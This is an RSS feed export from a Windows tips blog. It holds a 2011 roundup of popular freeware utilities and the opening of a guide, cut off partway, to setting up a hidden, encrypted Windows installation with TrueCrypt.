<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-3484615790471358750</atom:id><lastBuildDate>Thu, 24 Oct 2024 18:20:01 +0000</lastBuildDate><category>Hacking</category><category>Softwares</category><category>Hacking Tools</category><category>Windows</category><category>Open Source Operating system</category><category>Tricks</category><category>Messenger</category><category>Bestof2010</category><category>Networking</category><title>Hacking tips &amp;amp; Tricks</title><description></description><link>http://hack-fun.blogspot.com/</link><managingEditor>noreply@blogger.com (Manpreet)</managingEditor><generator>Blogger</generator><openSearch:totalResults>42</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-1462872937855354711</guid><pubDate>Mon, 24 Jan 2011 14:27:00 +0000</pubDate><atom:updated>2011-01-24T19:57:42.940+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Bestof2010</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><title>Most Popular Freewares for  Windows of 2010</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Hi, Punjabi Hacker readers. These are the most popular free windows softwares of 2010. Enjoy!!!&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;br /&gt;
&lt;b&gt;Soluto Is an Awesome Tool to Speed Up Your System Boot, Fix System Slowdowns&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhegggKJHnG0ua26z8G6z7IWAKCABtbZY6yx-oHTKr09rjDpDSOjCBW7Mzy8RJjwogPlcJbJmTbGqSeyjsrQIvTk1004i-t1WnhhvPaW1sFRj2WMjFft1PrSFOVkGK0PzTngZ-Ugq-4Kwd1/s1600/1.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhegggKJHnG0ua26z8G6z7IWAKCABtbZY6yx-oHTKr09rjDpDSOjCBW7Mzy8RJjwogPlcJbJmTbGqSeyjsrQIvTk1004i-t1WnhhvPaW1sFRj2WMjFft1PrSFOVkGK0PzTngZ-Ugq-4Kwd1/s320/1.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Soluto tracks your boot time and gives you the break down on what applications are causing hang ups-including grouping them into &quot;No-Brainger&quot; and &quot;Potentially Removable&quot; groups for easy weeding.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;LookInMyPC Is a Must-Have Tool for Computer Troubleshooting&lt;/span&gt;&lt;/b&gt;&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmxQbnDQ1sHx1oZ5ZO6kYW0-r4-PbdFDsa8AmRvKUWCoU4SV46ihjgYQvAWbnmAE5CUp4EMPR_vLIf1wSreqFl6VAOqueFp6RL93F9qiO7dM9wblq-WjLXGRGa_EuTxeoHF5Z7hb2ehQ4B/s1600/2.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmxQbnDQ1sHx1oZ5ZO6kYW0-r4-PbdFDsa8AmRvKUWCoU4SV46ihjgYQvAWbnmAE5CUp4EMPR_vLIf1wSreqFl6VAOqueFp6RL93F9qiO7dM9wblq-WjLXGRGa_EuTxeoHF5Z7hb2ehQ4B/s320/2.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;LookInMyPC is an at-a-glance tool that puts all your system information-in detail-right in front of you. You can find all this information by digging through your computer with various Windows tools, of course, but it&#39;s extremely convenient to have everything in one place.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Snow Transformation Pack Makes Your Windows Desktop Look Like Mac OS X&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPIh5Y8dFMcu3f5RVRJLhw3S7-OPO3SamIh54eh2QPh2TY0o7SR7SkymYL93xZuvtMA7QlcJW7s0hS_e3_mD462A8TwT8cBE5Y1qao9TxNfcTJ9tA8Q7BkGgmzSAsXsbBbecl1TFdKS0le/s1600/3.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPIh5Y8dFMcu3f5RVRJLhw3S7-OPO3SamIh54eh2QPh2TY0o7SR7SkymYL93xZuvtMA7QlcJW7s0hS_e3_mD462A8TwT8cBE5Y1qao9TxNfcTJ9tA8Q7BkGgmzSAsXsbBbecl1TFdKS0le/s320/3.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;You like the look of Mac OS X but you want to stick with windows-for work, for gaming, for a deep seated sense that Steve Jobs is out to get you. Snow Transformation Pack overhauls the Windows interface to look like OS X. This isn&#39;t just a lame icon pack, this is a total transformation. &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;FlashHacker Keeps Flash Videos in Full Screen on Your Dual Monitors&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXPMjGudja-9RXbpfmFdUb68qf3BvbsI7jgmqF_KgoFStg5EW_Vphdj44MY8zimKNrF_0oNsuv3OMx8BfGedVO5_lbSC58zyTVL99fmwlYMeN7m-tP8QKtF9ebVw_fdjlRVfCs415bS880/s1600/4.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXPMjGudja-9RXbpfmFdUb68qf3BvbsI7jgmqF_KgoFStg5EW_Vphdj44MY8zimKNrF_0oNsuv3OMx8BfGedVO5_lbSC58zyTVL99fmwlYMeN7m-tP8QKtF9ebVw_fdjlRVfCs415bS880/s320/4.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;You wouldn&#39;t think it would be so hard to enjoy flash video in full screen on your secondary monitor, but without tools like FlashHacker it&#39;s quite a headache. Enjoy South Park in full screen on your extra monitor while working in your primary.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;CCleaner Enhancer Makes CCleaner Even Better, Now Cleans 270 New Apps&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOLD1YJpxwh_GZdFoCdd_kbBBPyCwXweFHacautMMGpsGCf6C6s9P5cIpeaobtp-FG355uPr7KXmsg49AK-790j4hkTsZfeuKA-hFYsEipBUGESUya1PSw8IhIqeTCSWvicLxYjBVbtC98/s1600/5.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOLD1YJpxwh_GZdFoCdd_kbBBPyCwXweFHacautMMGpsGCf6C6s9P5cIpeaobtp-FG355uPr7KXmsg49AK-790j4hkTsZfeuKA-hFYsEipBUGESUya1PSw8IhIqeTCSWvicLxYjBVbtC98/s320/5.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;What could make the popular computer cleaning and tweaking application CCleaner even better? CCleaner Enhancer extends the reach of CCleaner by expanding its database of programs and the digital debris they leave behind.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;ZeuApp Downloads 82 Awesome Open Source Apps &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOCa_sdNvsVKJdfrqqGm_L6VtPK1_pf1OHtJTHzdZapMfslovBS6XxY-gnj_pflzv1ye2Ynmw7K7ahYY5XJceloD-B7XJl0LtGP9ivRhH0cbyoittdWrD5owWupxQkMM3zd-tdzoVeI4jl/s1600/6.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOCa_sdNvsVKJdfrqqGm_L6VtPK1_pf1OHtJTHzdZapMfslovBS6XxY-gnj_pflzv1ye2Ynmw7K7ahYY5XJceloD-B7XJl0LtGP9ivRhH0cbyoittdWrD5owWupxQkMM3zd-tdzoVeI4jl/s320/6.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;If you love open source apps and you want an easy way to download them in bulk (or introduce a friend to the gift of open source), ZeuApp makes it dead simple to batch download 82 great open-source applications. &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Google Map Buddy Generates High Resolution, Full Size Area Maps&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj8sfMBdCnbaADYoXHpTvjFvRlegLIcX8v06VVspU1azcvU1LCnVics16q9M_uwwWTeL8m4YB8SKCiKjOAl2kmKaHL3eJeEByejcC8yCVZ_UyurwK2aQuagNhQeKKi7c4e4Z2NMRaKbzor/s1600/7.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj8sfMBdCnbaADYoXHpTvjFvRlegLIcX8v06VVspU1azcvU1LCnVics16q9M_uwwWTeL8m4YB8SKCiKjOAl2kmKaHL3eJeEByejcC8yCVZ_UyurwK2aQuagNhQeKKi7c4e4Z2NMRaKbzor/s320/7.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Google Map Buddy is a free and portable application with a singular focus: leaching high-res captures from Google Maps. If you&#39;ve ever wanted to wallpaper your office with a map of the downtown, now&#39;s your chance.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Steam Mover Relocates Applications to Free Up Space on Your Primary Drive&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgXzkhNeVk7HxUMuzNpcbdffKBVHeUIeeXRWqhOYCT9IWps5cy5QZkpK4FZ3tjauY5tb0aAy3kys1t_clrTOi6GEOOnzymw0U11d-4V7ddgD6m9AhvPa4qp48l0xsJWEE4C-engCoEneoA/s1600/8.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgXzkhNeVk7HxUMuzNpcbdffKBVHeUIeeXRWqhOYCT9IWps5cy5QZkpK4FZ3tjauY5tb0aAy3kys1t_clrTOi6GEOOnzymw0U11d-4V7ddgD6m9AhvPa4qp48l0xsJWEE4C-engCoEneoA/s320/8.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Steam Mover is a handy application, originally designed for gamers, that makes it dead simple to move infrequently used applications from your primary drive to a secondary drive. It&#39;s not 100% foolproof but it works really well for most applications.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Ei.cfg Removal Utility Lets You Use Any Product Key With Your Windows 7 Disc&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgioB6IUYaisbVlLMrhpLQfUEYLBkyTiTUbABk7MYQFeG1mL5gsIX2ARJ6dsKax8T0LVOtAT7ZXVro3fsuCDDRvsHnL9paoKxMpNMr400mmmO3iFPWSYdfs3snC6QN67_nU3Fr9XSTNDjsi/s1600/9.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgioB6IUYaisbVlLMrhpLQfUEYLBkyTiTUbABk7MYQFeG1mL5gsIX2ARJ6dsKax8T0LVOtAT7ZXVro3fsuCDDRvsHnL9paoKxMpNMr400mmmO3iFPWSYdfs3snC6QN67_nU3Fr9XSTNDjsi/s320/9.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Windows 7 install discs are edition specific-unless you use Ei.cfg. If you&#39;ve got a valid disc but the wrong edition key you can still use the disc to install the right edition for the key you have. It&#39;s an invaluable tool when you&#39;ve got valid discs, valid keys, but not in matching editions.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;ToneCheck Stops You from Sending Passive Aggressive (or Plain Aggressive) Emails&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBUs1K5lS-PUhsByAqXDzUiX8OvlZ7DgJ_MochuvAQPGZbdaDB2Z7vn63bBfIM9YX4SsJMiKM9jrDvh0OTM9772UbwnLUyL_T05YQFE6NaHSmziJc_si8aaJZQdrckI5-2B43sM68QIIV4/s1600/10.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBUs1K5lS-PUhsByAqXDzUiX8OvlZ7DgJ_MochuvAQPGZbdaDB2Z7vn63bBfIM9YX4SsJMiKM9jrDvh0OTM9772UbwnLUyL_T05YQFE6NaHSmziJc_si8aaJZQdrckI5-2B43sM68QIIV4/s320/10.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;ToneCheck is an Outlook plug-in that checks the tone and word selection of your email and warns you before you fire off an email you might regret. Although the idea is promising our testing yielded mixed results-human emotion and intention are, after all, quite difficult for a computer to analyze.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;uTorrent 2.0 Brings Performance Updates, Bandwidth Control, UDP Support, and More&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqFKRuCHrzuFSRzvEXMs902n3J-wU-oPZvdDkCI51YrqHZJR_Rn1Kss4eROOyquNq6mWx-Gk2aYCSfYmqRQgWsLm_71cbCyvU6cAgpuKrQ9voltf258nDMDgsQ1nBn1Aiw4JFm7_xvRPx4/s1600/11.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqFKRuCHrzuFSRzvEXMs902n3J-wU-oPZvdDkCI51YrqHZJR_Rn1Kss4eROOyquNq6mWx-Gk2aYCSfYmqRQgWsLm_71cbCyvU6cAgpuKrQ9voltf258nDMDgsQ1nBn1Aiw4JFm7_xvRPx4/s320/11.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;uTorrent is a wildly popular BitTorrent client, earlier this year it updated to version 2.0 and brought a host of new features including bandwidth management, UDP support, and other improvements.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Pale Moon Is a Faster Firefox Clone for Windows&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd205zO9mqZItg_cFVCLFOKeCMtivXNIq6xMCMYnrA76KzclYLOliLtcjLlp_LvzHLp2S3bIy37iYoa-y82zhaLPrMle9ttZa7-gPPk92i-DCoLf7XNtL9tK8q8AQwBn2xu9Gr1IoG7snN/s1600/12.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd205zO9mqZItg_cFVCLFOKeCMtivXNIq6xMCMYnrA76KzclYLOliLtcjLlp_LvzHLp2S3bIy37iYoa-y82zhaLPrMle9ttZa7-gPPk92i-DCoLf7XNtL9tK8q8AQwBn2xu9Gr1IoG7snN/s320/12.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;If you love Firefox but you&#39;d like it to be a little snappier, Pale Moon is a Firefox clone optimized for speed. It&#39;s a Windows-specific build and it clocks in at 25% faster than a stock Firefox install.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Disk Space Fan Analyzes Hard Drive Space with a Dash of Eye Candy&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqbZq5wQcLynRamohLvq1meO8hrzmlXF3OLPLZiox3lfTSH3_bjuqbkq8sq30JOh1n50lxRSdEoK2TprTvE8fFRTN4gEDKCY_XyMuzp7bxBg49ix-P6M5dixhwaORXceuPg48RDNYAPpj0/s1600/13.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqbZq5wQcLynRamohLvq1meO8hrzmlXF3OLPLZiox3lfTSH3_bjuqbkq8sq30JOh1n50lxRSdEoK2TprTvE8fFRTN4gEDKCY_XyMuzp7bxBg49ix-P6M5dixhwaORXceuPg48RDNYAPpj0/s320/13.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Your hard drive is full again and you&#39;re not sure why. Out of control temp files? Overly complete Hello Kitty collection? Disk Space Fan gives you a quick and dirty visual analysis of your hard drive usage. Once you scan a drive you can drill down quickly to see what folders and sub-folders are sucking up what disk space.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Freemake Is a Remarkably Simple, Yet Feature-Filled Video Converter and Editor&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Ae7V3tB4CtQ2vqZE0RefKBjs5S9uRzjURFe0R2BJSmi6oKFRrdcDLNcE6OifDovS2O_WTeiBIiy7z3FxKk1b4JCn2uKKPbAYob0ube-089iPX8Bu4RYk4iK6KQRwZREiYXGSwQO2kRTK/s1600/14.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Ae7V3tB4CtQ2vqZE0RefKBjs5S9uRzjURFe0R2BJSmi6oKFRrdcDLNcE6OifDovS2O_WTeiBIiy7z3FxKk1b4JCn2uKKPbAYob0ube-089iPX8Bu4RYk4iK6KQRwZREiYXGSwQO2kRTK/s320/14.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;There are a lot of video conversion apps floating around. Freemake stands out thanks to a dead simple interface that guides even the greenest video converting newbie through the process without a hiccup. Whether you&#39;re converting for your iPod, your cell phone, or burning to a DVD, Freemake has a simple workflow you can follow.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;MultiBootISOs Boots Multiple Operating Systems from a USB Drive&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCWSleMrV5fzPDCKT_qRHi-ohjWOkdDLq3qUyvuG72Pn7i0TNWn0Bzt94cArzQltI_2NFmsh54FJIjJ4OvUeJRubv0e0iwAaKiSlX1nR6U3C4m3bz37DLmI1N3kC7SdrgnwfuhyphenhyphenJwXNj5b/s1600/25.jpg&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCWSleMrV5fzPDCKT_qRHi-ohjWOkdDLq3qUyvuG72Pn7i0TNWn0Bzt94cArzQltI_2NFmsh54FJIjJ4OvUeJRubv0e0iwAaKiSlX1nR6U3C4m3bz37DLmI1N3kC7SdrgnwfuhyphenhyphenJwXNj5b/s320/25.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;If you&#39;re up in the air on which OS you want to run off your thumb drive MultiBootISOs enables multi-boot support on your USB devices. You can load as many operating systems as your thumb drive can hold and select between them at boot. &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><link>http://hack-fun.blogspot.com/2011/01/most-popular-freewares-for-windows-of.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhegggKJHnG0ua26z8G6z7IWAKCABtbZY6yx-oHTKr09rjDpDSOjCBW7Mzy8RJjwogPlcJbJmTbGqSeyjsrQIvTk1004i-t1WnhhvPaW1sFRj2WMjFft1PrSFOVkGK0PzTngZ-Ugq-4Kwd1/s72-c/1.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-4161894502572569878</guid><pubDate>Fri, 26 Nov 2010 14:56:00 +0000</pubDate><atom:updated>2010-11-26T20:26:57.348+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Open Source Operating system</category><category domain="http://www.blogger.com/atom/ns#">Tricks</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><title>How to Encrypt and Hide Your Entire Operating System from Prying Eyes</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs9Jf5FP9wWJn0tiTykOBhpNw0qcogNR0n79YBWJLK7cJ0DSY8rb8-L0lDLZCmueRsMEuYkuXhQgpXbb2ZadBAMO252ARy6d1kQNpAYIqXxlT4cWBs5hq7MuUFKzoqpnvFC_Wi12KZ4CC_/s1600/1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;128&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs9Jf5FP9wWJn0tiTykOBhpNw0qcogNR0n79YBWJLK7cJ0DSY8rb8-L0lDLZCmueRsMEuYkuXhQgpXbb2ZadBAMO252ARy6d1kQNpAYIqXxlT4cWBs5hq7MuUFKzoqpnvFC_Wi12KZ4CC_/s320/1.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Iif you&#39;re &lt;i&gt;really&lt;/i&gt; serious about protecting your data, you can actually hide your entire operating system. Here&#39;s exactly how to do it.  To accomplish this task, we&#39;ll be using True Crypt, our favorite free and open-source disk encryption software that runs on all platforms, supports hidden volumes, and can even encrypt your entire hard drive.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHgdNH14cUiiaWUc3TcKfqgLKJdmPq-dkfJ2YIf6upZz5x_Yo199VK2pdQDwDULXte4By2r4vTVrLr3hjlE7Ioff-AU-4WGHzoNRS3vMRnuG1tyeWMbGViz8qK2G07gxh4lBojH556JvZx/s1600/2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;119&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHgdNH14cUiiaWUc3TcKfqgLKJdmPq-dkfJ2YIf6upZz5x_Yo199VK2pdQDwDULXte4By2r4vTVrLr3hjlE7Ioff-AU-4WGHzoNRS3vMRnuG1tyeWMbGViz8qK2G07gxh4lBojH556JvZx/s320/2.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&amp;nbsp;Once we&#39;ve completed the setup, you&#39;ll have two Windows installations  and two passwords. One password will activate a hidden Windows  installation as your real operating system, and the other, a decoy  install to throw intruders off the trail. &lt;/div&gt;&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Setting Up Your Hidden Operating System&lt;/h3&gt;In order to actually activate the hidden operating system features,  you&#39;ll need to make sure that your hard drive is partitioned in a very  particular way: You&#39;ll need two partitions on your drive, and the first  partition has to have your Windows install on it. The second partition  needs to be bigger than the first, and if you&#39;re using NTFS as your file  system, it will need to be at least 2.1 times as big as the first  partition. You can re-partition your current drive, but your best bet  will be a clean installation. (As with skinning a cat, there are many  ways to partition a hard drive. Windows 7 and Vista have built in  partitioning tools [open Computer Management, then go to Storage -&amp;gt;  Disk Management in the sidebar], or you could check out our guide to dual booting windows 7 as a solid resource to get started with a partitioned system.)&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5K9e1iYVjWDeJi2sYnoN2eYREFY7QmcFIyoi92lxiVbi5107KEatpRyXqTQNloNc79NfKT0t_fJLzqn5m60cFMpDfu6EuKTHGvGpqBU4df5qDGWLIIFqBMFEhQIm0FD29HN6b2Cpn4hyk/s1600/3.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;165&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5K9e1iYVjWDeJi2sYnoN2eYREFY7QmcFIyoi92lxiVbi5107KEatpRyXqTQNloNc79NfKT0t_fJLzqn5m60cFMpDfu6EuKTHGvGpqBU4df5qDGWLIIFqBMFEhQIm0FD29HN6b2Cpn4hyk/s320/3.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;
